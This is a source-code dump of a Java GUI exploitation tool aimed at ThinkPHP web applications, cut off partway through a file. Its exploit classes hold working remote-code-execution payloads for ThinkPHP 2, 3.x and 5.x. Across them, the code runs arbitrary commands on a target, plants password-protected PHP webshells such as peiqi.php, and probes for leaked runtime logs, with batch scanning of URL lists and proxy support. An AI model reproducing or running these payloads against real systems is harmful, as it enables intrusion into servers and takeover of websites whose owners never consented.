4 | import java.net.PasswordAuthentication;
5 |
6 | public class ProxyAuthenticator extends Authenticator {
7 | private final String username;
8 | private final String password;
9 |
10 | public ProxyAuthenticator(String username, String password) {
11 | this.username = username;
12 | this.password = password;
13 | }
14 |
15 | @Override
16 | protected PasswordAuthentication getPasswordAuthentication() {
17 | return new PasswordAuthentication(username, password.toCharArray());
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/controller/ThinkphpGUIController.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.controller;
2 |
3 | import com.thinkphp.thinkphpgui.common.BasePayload;
4 | import com.thinkphp.thinkphpgui.entity.Result;
5 | import com.thinkphp.thinkphpgui.service.BatchCheckTask;
6 | import com.thinkphp.thinkphpgui.service.CheckTask;
7 | import com.thinkphp.thinkphpgui.util.*;
8 |
9 | import javafx.application.Platform;
10 | import javafx.fxml.FXML;
11 | import javafx.geometry.Insets;
12 | import javafx.geometry.Pos;
13 | import javafx.scene.control.*;
14 | import javafx.scene.layout.GridPane;
15 | import javafx.scene.layout.HBox;
16 | import javafx.stage.FileChooser;
17 | import javafx.stage.Stage;
18 | import javafx.stage.Window;
19 |
20 | import java.io.File;
21 | import java.util.ArrayList;
22 | import java.util.HashMap;
23 | import java.util.List;
24 | import java.util.Map;
25 |
26 | public class ThinkphpGUIController {
27 | //主UI元素定义
28 | @FXML
29 | private TextField url_txt, file_txt, cmd_txt;
30 | @FXML
31 | private TextArea infores_txt, cmdres_txt;
32 | @FXML
33 | private Button import_btn;
34 | @FXML
35 | private ComboBox comboBox;
36 | List list_url = new ArrayList<>();
37 | Alert alert = new Alert(Alert.AlertType.INFORMATION);
38 | public static Map currentProxy = new HashMap<>();
39 |
40 | public void initialize() {
41 | comboBox.setValue("ALL");
42 | comboBox.getItems().add("ALL");
43 | comboBox.getItems().addAll(ExpList.get_exp());
44 | }
45 |
46 | @FXML
47 | private void proxy_set() {
48 | final Alert inputDialog = new Alert(Alert.AlertType.NONE);
49 | inputDialog.setResizable(true);
50 | final Window window = inputDialog.getDialogPane().getScene().getWindow();
51 | window.setOnCloseRequest(e -> window.hide());
52 |
53 | ToggleGroup statusGroup = new ToggleGroup();
54 | RadioButton enableRadio = new RadioButton("启用");
55 | RadioButton disableRadio = new RadioButton("禁用");
56 | enableRadio.setToggleGroup(statusGroup);
57 | disableRadio.setToggleGroup(statusGroup);
58 | HBox statusHbox = new HBox(10.0D, enableRadio, disableRadio);
59 | GridPane proxyGridPane = new GridPane();
60 | proxyGridPane.setVgap(15.0D);
61 | proxyGridPane.setPadding(new Insets(20.0D, 20.0D, 0.0D, 10.0D));
62 | Label typeLabel = new Label("类型:");
63 | Label type = new Label("HTTP");
64 | Label IPLabel = new Label("IP地址:");
65 | TextField IPText = new TextField();
66 | Label PortLabel = new Label("端口:");
67 | TextField PortText = new TextField();
68 | Label userNameLabel = new Label("用户名:");
69 | TextField userNameText = new TextField();
70 | Label passwordLabel = new Label("密码:");
71 | TextField passwordText = new TextField();
72 | Button cancelBtn = new Button("取消");
73 | Button saveBtn = new Button("保存");
74 | saveBtn.setDefaultButton(true);
75 |
76 | // Set values if currentProxy is not null
77 | IPText.setText( currentProxy.getOrDefault("ipAddress", ""));
78 | PortText.setText(currentProxy.getOrDefault("port", ""));
79 | userNameText.setText(currentProxy.getOrDefault("username", ""));
80 | passwordText.setText(currentProxy.getOrDefault("password", ""));
81 | enableRadio.setSelected(currentProxy.get("proxy") != null && currentProxy.get("proxy").equals("Y"));
82 |
83 | saveBtn.setOnAction(e -> {
84 | if (disableRadio.isSelected()) {
85 | currentProxy.put("proxy", "N");
86 | Tools.removeGlobalProxy();
87 | } else {
88 | String ipAddress = IPText.getText().trim();
89 | String port = PortText.getText().trim();
90 | String username = userNameText.getText().trim();
91 | String password = passwordText.getText().trim();
92 | if (!username.isEmpty()) {
93 | Tools.setGlobalProxy(ipAddress, port, username, password);
94 | } else {
95 | Tools.setGlobalProxy(ipAddress, port);
96 | }
97 | currentProxy.put("ipAddress", ipAddress);
98 | currentProxy.put("port", port);
99 | currentProxy.put("username", username);
100 | currentProxy.put("password", password);
101 | currentProxy.put("proxy", "Y");
102 | }
103 | inputDialog.getDialogPane().getScene().getWindow().hide();
104 | });
105 |
106 | cancelBtn.setOnAction(e -> inputDialog.getDialogPane().getScene().getWindow().hide());
107 |
108 | proxyGridPane.add(statusHbox, 1, 0);
109 | proxyGridPane.add(typeLabel, 0, 1);
110 | proxyGridPane.add(type, 1, 1);
111 | proxyGridPane.add(IPLabel, 0, 2);
112 | proxyGridPane.add(IPText, 1, 2);
113 | proxyGridPane.add(PortLabel, 0, 3);
114 | proxyGridPane.add(PortText, 1, 3);
115 | proxyGridPane.add(userNameLabel, 0, 4);
116 | proxyGridPane.add(userNameText, 1, 4);
117 | proxyGridPane.add(passwordLabel, 0, 5);
118 | proxyGridPane.add(passwordText, 1, 5);
119 | HBox buttonBox = new HBox(20.0D, cancelBtn, saveBtn);
120 | buttonBox.setAlignment(Pos.CENTER);
121 | GridPane.setColumnSpan(buttonBox, 2);
122 | proxyGridPane.add(buttonBox, 0, 6);
123 | inputDialog.getDialogPane().setContent(proxyGridPane);
124 | inputDialog.showAndWait();
125 | }
126 |
127 | @FXML
128 | private void about() {
129 | alert.setTitle("提示:");
130 | alert.setHeaderText("by nex121");
131 | alert.setContentText("本人使用javafx更新了下UI,增加了几个poc,略微优化下代码!");
132 | alert.showAndWait();
133 | }
134 |
135 | @FXML
136 | private void clear() {
137 | infores_txt.setText("");
138 | cmdres_txt.setText("");
139 | }
140 |
141 | public void loginfo(String info) {
142 | Platform.runLater(() -> this.infores_txt.appendText(info + "\r\n"));
143 | }
144 |
145 | public void logcmd(String info) {
146 | Platform.runLater(() -> this.cmdres_txt.appendText(info));
147 | }
148 |
149 |
150 | @FXML
151 | public void getShell() throws Exception {
152 | String url = this.url_txt.getText();
153 | String version = this.comboBox.getSelectionModel().getSelectedItem();
154 | String res;
155 |
156 | if (version.startsWith("ALL")) {
157 | alert.setTitle("提示:");
158 | alert.setHeaderText("信息");
159 | alert.setContentText("请选择漏洞对应版本!");
160 | alert.showAndWait();
161 | } else {
162 | BasePayload bp = Tools.getPayload(version);
163 | Result vul = bp.getShell(url);
164 | if (vul.isRes()) {
165 | res = vul.getPayload();
166 | loginfo("[+] " + res);
167 | } else {
168 | alert.setTitle("提示:");
169 | alert.setHeaderText("信息");
170 | alert.setContentText("Getshell失败");
171 | alert.showAndWait();
172 | }
173 | }
174 | }
175 |
176 | @FXML
177 | public void batch_import_url() {
178 | Stage stage = (Stage) import_btn.getScene().getWindow();
179 | FileChooser fileChooser = new FileChooser();
180 | fileChooser.setTitle("Select URL File");
181 | File file = fileChooser.showOpenDialog(stage);
182 |
183 | if (file != null) {
184 | this.file_txt.setText(file.getAbsolutePath());
185 | list_url = Tools.read_file(file.getAbsolutePath());
186 | alert.setTitle("提示:");
187 | alert.setHeaderText("导入提示");
188 | alert.setContentText("成功导入" + list_url.size() + "个URL!");
189 | alert.showAndWait();
190 | }
191 | }
192 |
193 | @FXML
194 | public void batch_check_url() {
195 | BatchCheckTask bct = new BatchCheckTask(list_url, comboBox, infores_txt);
196 | new Thread(bct).start();
197 | }
198 |
199 | @FXML
200 | private void check_url() {
201 | boolean standard = Tools.checkTheURL(this.url_txt.getText());
202 |
203 | if (standard) {
204 | CheckTask ct = new CheckTask(comboBox, url_txt, infores_txt);
205 | new Thread(ct).start();
206 | } else {
207 | alert.setTitle("提示:");
208 | alert.setHeaderText("URL检查");
209 | alert.setContentText("URL格式不符合要求,示例:http://127.0.0.1:7001");
210 | alert.showAndWait();
211 | }
212 | }
213 |
214 | @FXML
215 | public void exe_vul() throws Exception {
216 | String url = this.url_txt.getText();
217 | String version = this.comboBox.getSelectionModel().getSelectedItem();
218 | String cmd = this.cmd_txt.getText();
219 | String res;
220 |
221 | if (version.startsWith("ALL")) {
222 | alert.setTitle("提示:");
223 | alert.setHeaderText("信息");
224 | alert.setContentText("请选择漏洞对应版本!");
225 | alert.showAndWait();
226 | } else {
227 | BasePayload bp = Tools.getPayload(version);
228 | Result vul = bp.exeVUL(url, cmd);
229 | if (vul.isRes()) {
230 | res = vul.getPayload();
231 | logcmd("[+] " + res);
232 | } else {
233 | alert.setTitle("提示:");
234 | alert.setHeaderText("信息");
235 | alert.setContentText("命令执行失败!");
236 | alert.showAndWait();
237 | }
238 | }
239 | }
240 | }
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/entity/Result.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.entity;
2 |
3 |
4 | public class Result {
5 | boolean res;
6 | String payload;
7 | String vuln;
8 |
9 | public boolean isRes() {
10 | return res;
11 | }
12 |
13 | public void setRes(boolean res) {
14 | this.res = res;
15 | }
16 |
17 | public String getPayload() {
18 | return payload;
19 | }
20 |
21 | public String getVuln() {
22 | return vuln;
23 | }
24 |
25 | public Result(boolean res, String vuln, String payload) {
26 | this.res = res;
27 | this.payload = payload;
28 | this.vuln = vuln;
29 | }
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp2_rce.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | public class tp2_rce implements BasePayload {
8 | @Override
9 | public Result checkVUL(String url) throws Exception {
10 | String CheckStr = "PHP Version";
11 | String payload = url + "/?s=/index/index/name/$%7B@phpinfo()%7D";
12 | try {
13 | HttpRequest req = HttpRequest.get(payload);
14 | if (req.body().contains(CheckStr)) {
15 | return new Result(true, "ThinkPHP 2 RCE", payload);
16 | }
17 | } catch (Exception e) {
18 | e.printStackTrace();
19 | }
20 | return new Result(false, "ThinkPHP 2 RCE", null);
21 | }
22 |
23 | @Override
24 | public Result exeVUL(String url, String cmd) throws Exception {
25 | String payload = url + "?s=/index/index/index/${system(" + cmd + ")}";
26 | try {
27 | String res = HttpRequest.get(payload).body();
28 | return new Result(true, null, res);
29 | } catch (Exception e) {
30 | e.printStackTrace();
31 | }
32 | return new Result(false, null, null);
33 | }
34 |
35 | @Override
36 | public Result getShell(String url) throws Exception {
37 | try {
38 | String shell_url = url + "/?s=/index/index/index/${@print(eval($_POST[nex]))}";
39 | int code = HttpRequest.get(shell_url).code();
40 | if (code == 200) {
41 | return new Result(true, null, shell_url+" Pass:nex");
42 | }
43 | } catch (Exception e) {
44 | e.printStackTrace();
45 | }
46 | return new Result(false, null, null);
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp3.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | public class tp3 implements BasePayload {
9 | @Override
10 | public Result checkVUL(String url) throws Exception {
11 | String CheckStr = "PHP Version";
12 | String module = Module.getModule(url);
13 | String payload = url + "/?s=" + module + "/\\think\\module/action/param1/${@phpinfo()}";
14 | try {
15 | HttpRequest req = HttpRequest.get(payload);
16 | if (req.body().contains(CheckStr)) {
17 | return new Result(true, "ThinkPHP 3.x RCE", payload);
18 | }
19 | } catch (Exception e) {
20 | e.printStackTrace();
21 | }
22 | return new Result(false, "ThinkPHP 3.x RCE", null);
23 | }
24 |
25 | @Override
26 | public Result exeVUL(String url, String cmd) throws Exception {
27 | String module = Module.getModule(url);
28 | String payload_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${system($_GET['x'])}}?x=" + cmd;
29 | try {
30 | String res = HttpRequest.get(payload_url).body();
31 | return new Result(true, null, res);
32 | } catch (Exception e) {
33 | e.printStackTrace();
34 | }
35 | return new Result(false, null, null);
36 | }
37 |
38 | @Override
39 | public Result getShell(String url) throws Exception {
40 | try {
41 | String module = Module.getModule(url);
42 | String shell_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${eval($_POST['peiqi'])}}";
43 | int code = HttpRequest.get(shell_url).code();
44 | if (code == 200) {
45 | return new Result(true, null, shell_url);
46 | }
47 | } catch (Exception e) {
48 | e.printStackTrace();
49 | }
50 | return new Result(false, null, null);
51 | }
52 | }
53 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp3_log.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 | import java.util.Date;
9 |
10 |
11 | public class tp3_log implements BasePayload {
12 | @Override
13 | public Result checkVUL(String url) throws Exception {
14 | String CheckStr = "INFO:";
15 | String CheckErr = "[ error ]";
16 | Date dt = new Date();
17 | String year = String.format("%tY", dt);
18 | String mon = String.format("%tm", dt);
19 | String day = String.format("%td", dt);
20 | String sjc = String.valueOf(dt.getTime()).substring(0, 10);
21 | String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";
22 | String suffix2 = sjc + "-" + year.substring(2, 4) + "_" + mon + "_" + day + ".log";
23 | ArrayList payload_urls = new ArrayList() {{
24 | add(url + "/Runtime/Logs/" + suffix1);
25 | add(url + "/Runtime/Logs/" + suffix2);
26 |
27 | add(url + "/Runtime/Logs/Home/" + suffix1);
28 | add(url + "/Runtime/Logs/Home/" + suffix2);
29 |
30 | add(url + "/Runtime/Logs/Common/" + suffix1);
31 | add(url + "/Runtime/Logs/Common/" + suffix2);
32 |
33 | add(url + "/App/Runtime/Logs/" + suffix1);
34 | add(url + "/App/Runtime/Logs/" + suffix2);
35 |
36 | add(url + "/App/Runtime/Logs/Home/" + suffix1);
37 | add(url + "/App/Runtime/Logs/Home/" + suffix2);
38 |
39 | add(url + "/Application/Runtime/Logs/" + suffix1);
40 | add(url + "/Application/Runtime/Logs/" + suffix2);
41 |
42 | add(url + "/Application/Runtime/Logs/Admin/" + suffix1);
43 | add(url + "/Application/Runtime/Logs/Admin/" + suffix2);
44 |
45 | add(url + "/Application/Runtime/Logs/Home/" + suffix1);
46 | add(url + "/Application/Runtime/Logs/Home/" + suffix2);
47 |
48 | add(url + "/Application/Runtime/Logs/App/" + suffix1);
49 | add(url + "/Application/Runtime/Logs/App/" + suffix2);
50 |
51 | add(url + "/Application/Runtime/Logs/Ext/" + suffix1);
52 | add(url + "/Application/Runtime/Logs/Ext/" + suffix2);
53 |
54 | add(url + "/Application/Runtime/Logs/Api/" + suffix1);
55 | add(url + "/Application/Runtime/Logs/Api/" + suffix2);
56 |
57 | add(url + "/Application/Runtime/Logs/Test/" + suffix1);
58 | add(url + "/Application/Runtime/Logs/Test/" + suffix2);
59 |
60 | add(url + "/Application/Runtime/Logs/Common/" + suffix1);
61 | add(url + "/Application/Runtime/Logs/Common/" + suffix2);
62 |
63 | add(url + "/Application/Runtime/Logs/Service/" + suffix1);
64 | add(url + "/Application/Runtime/Logs/Service/" + suffix2);
65 | }};
66 | try {
67 | for (String payload_url : payload_urls) {
68 | String res = HttpRequest.get(payload_url).body();
69 | if (res.contains(CheckStr) || res.contains(CheckErr)) {
70 | return new Result(true, "ThinkPHP 3.x 日志泄露", payload_url);
71 | }
72 | }
73 |
74 | } catch (Exception e) {
75 | e.printStackTrace();
76 | }
77 |
78 | return new Result(false, "ThinkPHP 3.x 日志泄露", null);
79 | }
80 |
81 | @Override
82 | public Result exeVUL(String url, String cmd) throws Exception {
83 | return new Result(false, null, null);
84 | }
85 |
86 | @Override
87 | public Result getShell(String url) throws Exception {
88 | return new Result(false, null, null);
89 | }
90 | }
91 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp3_log_rce.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 | import java.util.Date;
9 |
10 |
11 | public class tp3_log_rce implements BasePayload {
12 | Date dt = new Date();
13 | String year = String.format("%tY", dt);
14 | String mon = String.format("%tm", dt);
15 | String day = String.format("%td", dt);
16 | String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";
17 |
18 | @Override
19 | public Result checkVUL(String url) throws Exception {
20 | String CheckStr = "PHP Version";
21 |
22 | String payload_log = url + "?m=Home&c=Index&a=index&test=-->";
23 | ArrayList log_rces = new ArrayList() {{
24 | add(url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
25 | add(url + "/?m=Home&c=Index&a=index&info[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
26 | add(url + "/?m=Home&c=Index&a=index¶m[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
27 | add(url + "/?m=Home&c=Index&a=index&name[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
28 | add(url + "/?m=Home&c=Index&a=index&array[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
29 | add(url + "/?m=Home&c=Index&a=index&arr[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
30 | add(url + "/?m=Home&c=Index&a=index&list[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
31 | add(url + "/?m=Home&c=Index&a=index&page[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
32 | add(url + "/?m=Home&c=Index&a=index&menus[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
33 | add(url + "/?m=Home&c=Index&a=index&var[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
34 | add(url + "/?m=Home&c=Index&a=index&data[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
35 | add(url + "/?m=Home&c=Index&a=index&module[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
36 | }};
37 |
38 | //先发包,后检测。而不是每次都发包
39 | try {
40 | String log = HttpRequest.get(payload_log).body();
41 | } catch (Exception e) {
42 | e.printStackTrace();
43 | }
44 | for (String log_rce : log_rces) {
45 | try {
46 | String res = HttpRequest.get(log_rce).body();
47 | if (res.contains(CheckStr)) {
48 | return new Result(true, "ThinkPHP 3.x Log RCE", log_rce);
49 | }
50 | } catch (Exception e) {
51 | e.printStackTrace();
52 | }
53 | }
54 | return new Result(false, "ThinkPHP 3.x Log RCE", null);
55 | }
56 |
57 | @Override
58 | public Result exeVUL(String url, String cmd) throws Exception {
59 | String log_exe = url + "/?m=Home&c=Index&a=index&test=-->";
60 | String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
61 | try {
62 | String log = HttpRequest.get(log_exe).body();
63 | int code = HttpRequest.get(log_res).code();
64 | if (code == 200) {
65 | return new Result(true, null, log_res);
66 | }
67 | } catch (Exception e) {
68 | e.printStackTrace();
69 | }
70 | return new Result(false, null, null);
71 | }
72 |
73 | @Override
74 | public Result getShell(String url) throws Exception {
75 | String log_shell = url + "/?m=Home&c=Index&a=index&test=-->";
76 | String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
77 | try {
78 | String log = HttpRequest.get(log_shell).body();
79 | int code = HttpRequest.get(log_res).code();
80 | if (code == 200) {
81 | return new Result(true, null, log_res + " Pass:peiqi");
82 | }
83 | } catch (Exception e) {
84 | e.printStackTrace();
85 | }
86 | return new Result(false, null, null);
87 | }
88 |
89 | }
90 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp50.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | import java.util.ArrayList;
9 |
10 |
11 | public class tp50 implements BasePayload {
12 | @Override
13 | public Result checkVUL(String url) throws Exception {
14 | String CheckStr = "PHP Version";
15 | String module = Module.getModule(url);
16 | ArrayList payload_urls = new ArrayList() {{
17 | add(url + "/?s=/" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1");
18 | add(url + "/?s=/" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()");
19 | }};
20 |
21 | for (String payload_url : payload_urls) {
22 | try {
23 | HttpRequest req1 = HttpRequest.get(payload_url);
24 | if (req1.body().contains(CheckStr)) {
25 | return new Result(true, "ThinkPHP 5.0 RCE", payload_url);
26 | }
27 | } catch (Exception e) {
28 | e.printStackTrace();
29 | }
30 | }
31 | return new Result(false, "ThinkPHP 5.0 RCE", null);
32 | }
33 |
34 | @Override
35 | public Result exeVUL(String url, String cmd) throws Exception {
36 | String module = Module.getModule(url);
37 | try {
38 | String payload_url = url + "/?s=" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=" + cmd;
39 | HttpRequest req = HttpRequest.get(payload_url);
40 | String res = req.body();
41 | return new Result(true, null, res);
42 | } catch (Exception e) {
43 | e.printStackTrace();
44 | }
45 | return new Result(false, null, null);
46 | }
47 |
48 | @Override
49 | public Result getShell(String url) throws Exception {
50 | String module = Module.getModule(url);
51 | try {
52 | String payload_url = url + "/?s=" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '' >>peiqi.php";
53 | HttpRequest.get(payload_url).code();
54 | int code = HttpRequest.get(url + "/peiqi.php").code();
55 | if (code == 200) {
56 | return new Result(true, null, url + "/peiqi.php Pass:peiqi");
57 | }
58 | } catch (Exception e) {
59 | e.printStackTrace();
60 | }
61 | return new Result(false, null, null);
62 | }
63 | }
64 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5010.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | import java.util.ArrayList;
9 |
10 |
11 | //ThinkPHP <= 5.0.13
12 | public class tp5010 implements BasePayload {
13 |
14 | public Result checkVUL(String url) {
15 | String CheckStr = "PHP Version";
16 | String module = Module.getModule(url);
17 | String payload_url = url + "/?s=" + module;
18 |
19 | ArrayList payloads = new ArrayList() {{
20 | add("_method=__construct&method=get&filter[]=phpinfo&get[]=-1");
21 | add("s=-1&_method=__construct&method=get&filter[]=phpinfo");
22 | }};
23 |
24 | for (String payload : payloads) {
25 | try {
26 | HttpRequest req = HttpRequest.post(payload_url).send(payload);
27 | if (req.body().contains(CheckStr)) {
28 | return new Result(true, "ThinkPHP 5.0.10 construct RCE", payload_url + " Post: " + payload);
29 | }
30 | } catch (Exception e) {
31 | e.printStackTrace();
32 | }
33 | }
34 | return new Result(false, "ThinkPHP 5.0.10 construct RCE", null);
35 | }
36 |
37 | public Result exeVUL(String url, String cmd) throws Exception {
38 | String module = Module.getModule(url);
39 | String payload_url = url + "/?s=" + module;
40 | String payload_rce = "s=" + cmd + "&_method=__construct&method&filter[]=system";
41 | try {
42 | String response = HttpRequest.post(payload_url).send(payload_rce).body();
43 | String res = response.substring(0, response.indexOf("<"));
44 | if (res.equals("")) {
45 | return new Result(true, null, response);
46 | }
47 | return new Result(true, null, res);
48 | } catch (Exception e) {
49 | e.printStackTrace();
50 | }
51 | return new Result(false, null, null);
52 | }
53 |
54 |
55 | public Result getShell(String url) throws Exception {
56 | String module = Module.getModule(url);
57 | String payload_url = url + "/?s=" + module;
58 |
59 | ArrayList payloads = new ArrayList() {{
60 | add("_method=__construct&filter[]=system&mytest=echo '' >>peiqi.php");
61 | add("_method=__construct&method=get&filter[]=assert&get[]=file_put_contents('./peiqi.php','');");
62 | add("_method=__construct&method=get&filter[]=assert&get[]=/*1111*//***/file_put_contents/*1**/(/***/'./peiqi.php',/***/''/***/);');");
63 | add("s=file_put_contents('./peiqi.php','');&_method=__construct&method=&filter[]=assert");
64 | add("_method=__construct&method=get&filter[]=assert&get[]=copy('', './peiqi.php');");
65 | }};
66 | for (String payload : payloads) {
67 | try {
68 | HttpRequest.post(payload_url).send(payload).body();
69 | int code = HttpRequest.get(url + "/peiqi.php").code();
70 | if (code == 200) {
71 | return new Result(true, null, url + "/peiqi.php Pass:peiqi");
72 | }
73 | } catch (Exception e) {
74 | e.printStackTrace();
75 | }
76 | }
77 | return new Result(false, null, null);
78 | }
79 |
80 | }
81 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5022_5129.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | import java.util.ArrayList;
9 |
10 |
11 | //v5.0.23及v5.1.31以下版本
12 | public class tp5022_5129 implements BasePayload {
13 | @Override
14 | public Result checkVUL(String url) throws Exception {
15 | String CheckStr = "PHP Version";
16 | String module = Module.getModule(url);
17 | ArrayList payload_urls = new ArrayList() {{
18 | add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1");
19 | add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()");
20 | add(url + "/?s=/" + module + "/\\think\\view\\driver\\php/display&content=");
21 | }};
22 | for (String payload_url : payload_urls) {
23 | try {
24 | HttpRequest req1 = HttpRequest.get(payload_url);
25 | if (req1.body().contains(CheckStr)) {
26 | return new Result(true, "ThinkPHP 5.0.22/5.1.29 RCE", payload_url);
27 | }
28 | } catch (Exception e) {
29 | e.printStackTrace();
30 | }
31 | }
32 | return new Result(false, "ThinkPHP 5.0.22/5.1.29 RCE", null);
33 | }
34 |
35 | public Result exeVUL(String url, String cmd) throws Exception {
36 | String module = Module.getModule(url);
37 | try {
38 | String payload_url = url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=" + cmd;
39 | String res = HttpRequest.get(payload_url).body();
40 | return new Result(true, null, res);
41 | } catch (Exception e) {
42 | e.printStackTrace();
43 | }
44 | return new Result(false, null, null);
45 | }
46 |
47 | public Result getShell(String url) throws Exception {
48 | String module = Module.getModule(url);
49 |
50 | ArrayList payload_urls = new ArrayList() {{
51 | add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][]=");
52 | add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][1]=/***/')/**/;/**/?>");
53 | add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]=''&vars[1][1]=peiqi.php");
54 | add(url + "/?s=/" + module + "/\\think\\template\\driver\\file/write&cacheFile=peiqi.php&content=");
55 | }};
56 | for (String payload_url : payload_urls) {
57 | try {
58 | HttpRequest.get(payload_url).body();
59 | int code = HttpRequest.get(url + "/peiqi.php").code();
60 | if (code == 200) {
61 | return new Result(true, null, url + "/peiqi.php Pass:peiqi");
62 | }
63 | } catch (Exception e) {
64 | e.printStackTrace();
65 | }
66 | }
67 | return new Result(false, null, null);
68 | }
69 | }
70 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5023.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 |
9 | //ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha
10 | public class tp5023 implements BasePayload {
11 |
12 | @Override
13 | public Result checkVUL(String url) throws Exception {
14 | String CheckStr = "PHP Version";
15 |
16 | String payload_url = url + "/?s=captcha&test=-1";
17 | ArrayList payloads = new ArrayList() {{
18 | add("_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1");
19 | add("_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=phpinfo");
20 | add("_method=__construct&filter[]=phpinfo&method=GET&get[]=1");
21 | }};
22 | for (String payload : payloads) {
23 | try {
24 | HttpRequest req = HttpRequest.post(payload_url).send(payload);
25 | if (req.body().contains(CheckStr)) {
26 | return new Result(true, "ThinkPHP 5.0.23 RCE", payload_url + " Post: " + payload);
27 | }
28 | } catch (Exception e) {
29 | e.printStackTrace();
30 | }
31 | }
32 |
33 | return new Result(false, "ThinkPHP 5.0.23 RCE", null);
34 | }
35 |
36 | public Result exeVUL(String url, String cmd) throws Exception {
37 | String payload_url = url + "/?s=captcha&test=-1";
38 | ArrayList payloads = new ArrayList() {{
